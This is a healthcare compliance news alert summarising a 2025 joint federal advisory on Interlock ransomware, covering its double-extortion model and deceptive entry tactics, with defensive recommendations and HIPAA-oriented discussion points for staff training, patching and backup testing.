On July 22, 2025, the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released a joint advisory warning organizations about a ransomware threat known as Interlock. Since September 2024, Interlock ransomware actors have impacted a wide range of businesses and critical infrastructure sectors in North America and Europe.
According to the advisory, Interlock ransomware uses a double-extortion method. This means that not only are files encrypted and made inaccessible to the victim, but sensitive data is also stolen beforehand. If the victim doesn’t pay the ransom, the attackers threaten to leak the stolen data online. Victims are typically instructed to contact the attackers through a special hidden website on the dark web, and no ransom amount is provided until that initial contact is made. The ransomware has targeted virtual machines on both Windows and Linux systems, though it has not yet been widely used on physical workstations or servers.
What makes Interlock especially concerning is how it gains access to systems. The FBI has reported that attackers are using tactics such as fake browser updates or fake system error messages that trick users into downloading malware. One technique, known as “ClickFix,” fools users into running a command that secretly installs the ransomware. In some cases, simply visiting a compromised website can result in an infection—this is known as a “drive-by download.”
Once inside, the attackers use various tools to move throughout the network, steal passwords, and take control of additional systems. They often install keyloggers to record what users type, use tools to bypass security settings, and exploit weak or stolen credentials to access more sensitive areas. The stolen data is then uploaded to cloud storage or transferred using file-sharing tools before the encryption process begins.
The FBI and its partner agencies recommend that organizations take several key actions. Staff should be trained to recognize suspicious emails, pop-ups, or software update requests, and report them immediately. It’s also important for organizations to require multi-factor authentication for all accounts where possible, enforce strong password policies, and ensure that all systems, applications, and devices are regularly updated with security patches.
Organizations are urged to implement network protections that can detect unusual behavior, prevent unauthorized access, and limit the spread of malware. This includes using endpoint detection tools, segmenting internal networks, and regularly auditing account access. Backups of critical data should be maintained offline, encrypted, and tested to ensure they can be restored in case of a ransomware incident.
The full advisory, along with additional resources, is available here.
Issue:
The healthcare sector remains a high-value target for ransomware due to the sensitivity of patient data and the critical need for uninterrupted care. Interlock ransomware has affected various sectors including healthcare, using a double-extortion model to encrypt systems and steal data for leverage. It employs deceptive tactics, such as fake browser updates, to gain access, then steals credentials and exfiltrates data before encryption. While healthcare has not been identified as a primary target, the sector’s vulnerability underscores the importance of comprehensive safeguards under the Health Insurance Portability and Accountability Act (HIPAA) Security Rule to protect electronic protected health information (ePHI).
Discussion Points:
- Review policies and procedures related to cybersecurity and data protection under HIPAA. Ensure they address how to recognize and respond to ransomware threats, particularly those involving deceptive software updates or website downloads. Confirm that procedures include steps for incident response, backup and recovery, and reporting potential breaches.
- Train appropriate staff on identifying and reporting suspicious activity, including fake update prompts, unexpected browser behavior, or unusual access requests. Reinforce education on avoiding phishing attempts and malicious links. Training should be conducted at least annually and updated when new threats emerge.
- Periodically audit systems and staff compliance with cybersecurity protocols, including verification that software and systems are regularly patched and updated. Confirm that access controls are functioning as intended, and that backup and recovery systems are tested regularly for effectiveness.
*This news alert has been prepared by Med-Net Concepts, Inc. for informational purposes only and is not intended to provide legal advice.*